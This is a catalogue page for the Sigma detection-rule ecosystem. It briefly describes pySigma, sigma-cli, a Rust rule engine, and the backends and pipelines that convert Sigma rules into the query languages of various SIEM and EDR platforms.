Ecosystem
The tools, backends, and pipelines that power the Sigma detection ecosystem. Convert rules to any SIEM or log analytics platform with pySigma.
Core Tools
sigma engine
A high-performance Sigma rule engine written in Rust. Designed for real-time detection at scale - evaluate Sigma rules directly against log events without converting to an intermediate query language first.
pySigma
The Python library for parsing, transforming, and converting Sigma rules. Powers all official backends and pipelines.
sigma-cli
Command-line interface for converting Sigma rules using pySigma. Install backends and pipelines, convert rules to any supported format.
Community Pipelines
A curated collection of community-maintained pySigma pipelines for additional log sources and vendor-specific field mappings.
Backends
29Convert Sigma rules to platform-native query languages
Carbonblack
carbonblack
Carbon Black backend that supports queries for both Enterprise EDR (fka Threat Hunter) and EDR (fka Response)
Cortex XDR
cortexxdr
Cortex XDR backend that generates XQL queries.
CrowdStrike
crowdstrike
CrowdStrike Logscale backend and pipelines for CrowdStrike Falcon platform and Falcon Data Replicator (FDR) logs.
Dictquery
dictquery
DictQuery backend to convert sigma to dictquery query strings
Elasticsearch
elasticsearch
Elasticsearch backend converting into Lucene, ES|QL (with correlations) and EQL queries, plain, embedded into DSL or as Kibana NDJSON.
Ibm QRadar AQL
ibm-qradar-aql
IBM QRadar backend for conversion into AQL queries. Contains mappings for fields and logsources
Insightidr
insightidr
Rapid7 InsightIDR backend that generates LEQL queries.
Kusto
kusto
Kusto Query Language (KQL) backend and pipeline for conversion of log sources with Sysmon field schema to Microsoft Advanced Hunting Queries
Logpoint
logpoint
Logpoint Pysigma Backend
Grafana Loki
loki
Loki backend for conversion into Loki LogQL queries (plain and ruler YAML for alerts) and pipelines with mappings for Grafana and promtail Sysmon data.
OpenSearch
opensearch
Opensearch backend converting into Lucene queries and Opensearch alerting rules.
Panther
panther
Panther backend
QRadar
qradar
IBM QRadar backend for conversion into AQL and extension packages.
Sentinelone
sentinelone
SentinelOne backend that generates Deep Visibility queries.
Sentinelone Pq
sentinelone-pq
SentinelOne backend that generates PowerQuery queries.
SPLunk
splunk
Splunk backend for conversion into SPL and tstats data model queries as plain queries and savedsearches.conf
Uberagent
uberagent
uberAgent backend
Datadog
datadog
Datadog Cloud SIEM backend and pipeline for conversion of log sources to Datadog Query Syntax
Golangexpr
golangexpr
Golang Expr Backend
Hawk
hawk
HAWK.io MDR backend and pipeline for conversion of log sources to HAWK.io BETree queries.
Netwitness
netwitness
NetWitness Backend that generates application rules
Powershell
powershell
PowerShell backend converting into PowerShell queries.
SQLite
sqlite
SQLite and Zircolite backend
Surrealql
surrealql
SurrealQL Backend
Ala Socprime
ala-socprime
Azure Log Analytics backend with Windows log support maintained by SOC Prime.
Quickwit
quickwit
Quickwit Backend
Secops
secops
Google SecOps (formally Chronicle) backend and pipeline for conversion of Sigma Rules to SecOps Unified Data Model (UDM) searches and YARA-L 2.0 detection rules
Stix
stix
STIX backend converting into plain STIX queries. Contains mappings for STIX 2.0 and STIX Shifter taxonomies.
Trellix_helix
trellix_helix
Trellix Helix Backend
Pipelines
5Field mappings and log source normalization
Ocsf
ocsf
Mapping from generic log sources to OCSF events.
Rclinuxedr
rclinuxedr
Red Canary LinuxEDR pipeline that converts fields to Telemetry Search mapping.
Sysmon
sysmon
Mapping from generic log sources to Sysmon events.
Windows
windows
Windows logsource to Channel field and generic logsource to Windows audit events mapping.
Ossem
ossem
Mapping from OSSEM to Sigma taxonomy.
Need more pipelines?
The community pipelines repository is your next stop. Contribute your own or request new ones!